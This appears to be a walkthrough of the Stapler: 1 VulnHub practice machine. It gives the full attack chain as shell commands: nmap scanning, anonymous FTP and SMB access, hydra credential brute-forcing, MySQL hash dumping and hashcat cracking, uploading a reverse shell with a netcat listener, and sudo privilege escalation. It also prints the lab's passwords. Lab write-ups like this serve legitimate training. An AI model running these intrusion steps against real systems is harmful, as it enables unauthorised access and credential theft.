Stapler: 1 vulnhub walkthrough
this is vulnerable box and now we enumerate this box step by step
first download this box on vulnhub using this link and deploy this box your local virtual box machine
scan with nmap and confirm your box ip address
important : my pc ip change so don’t confuse
$ nmap -sn 192.168.1.1/24
192.168.1.214 is stapler machine ip so let’s enumerate 192.168.1.214 ip address
simple port scaning with nmap
$ nmap -v -p- 192.168.1.214
here we see many services running on stapler box let’s first enumerate port 80 and check what is port 80
we found some error on port 80 don’t worry let’s do script and default scan with nmap
$ sudo nmap -sC -sV -sT -sU -A -p 20,21,22,53,80,123,137,138,139,666,3306,12380 192.168.1.214
let’s check ftp service with anonymous username
$ ftp 192.168.1.214
see content on note file using cat command
$ cat note
open note file and see content on note file it’s look like user: Elly and user: john and a message
let’s enumerate port 139 for smb and check the data on smb service
$ smbclient -L 192.168.1.214
we sucessfully list smb data without any user and password now what data available on kathy directory and tmp directory
$ smbclient //192.168.1.214/kathy
we sucessfully login anonymously with kathy smb now we get all data on kathy user share directory we try to upload a file on kathy directory but we don’t have any kind of permission for put a file or make a directory or files let’s check kathy share data
now we use enum4linux command and enumerate
$ enum4linux -a 192.168.43.166we found some user names
using username let’s create dictionary
let’s adjust username using cut command
$ cat userall.txt |cut -d " " -f 3
$ cat myuser.txt |cut -d '\' -f 2
let’s try this user on ftp
$ hydra -L userlist.txt -P userlist.txt ftp://192.168.43.166we found a user and password let’s login with user and password
let’s try ftp password on ssh service
user : fin
password : SHayslett
we are login in ssh let’s enumerate
we found mysql password on wp-config.php file
let’s try mysql
$ mysql -h 192.168.43.166 -u root -p
we are sucessfully login in mysql
mysql> show databases;
MySQL [(none)]> use wordpress
MySQL [wordpress]> show tables;
MySQL [wordpress]> SELECT * FROM wp_users;
now we have hashes let’s crack this user hases using hashcat command
$ hashcat -O -m 400 -a 0 -o hash_output.txt hash.txt /usr/share/wordlists/rockyou.txtwe can use john for password cracking so let’s try with john
now use john
now we trying to get www data shell so we have a directory which have 777 permission
$ find / -perm 777 -type d 2>/dev/null
now upload our reverse shell on uploads directory using wget command
let’s start listner nc on your hand and call this shell
blogblog directory have a wordpress site but we want to execute our shell so execute now
wow now we got shell now enumerate www data user
first covert this shell to interactive shell using this link
privelege escalation
let’s enumerate www_data user
we found some usefull information on user bash_history file using find command
$ find -name .bash_history
$ cat ./JKanode/.bash_history
now try this id password with peter on ssh
username : peter
password : JZQuyIN5$ ssh peter@192.168.43.166
this is not bash shell so let’s take bash shell
red% /bin/bash
now using sudo -l we found user peter run all command using sudo
$ sudo -l
now let’s find flag
wow we got flag
happy hacking |:)
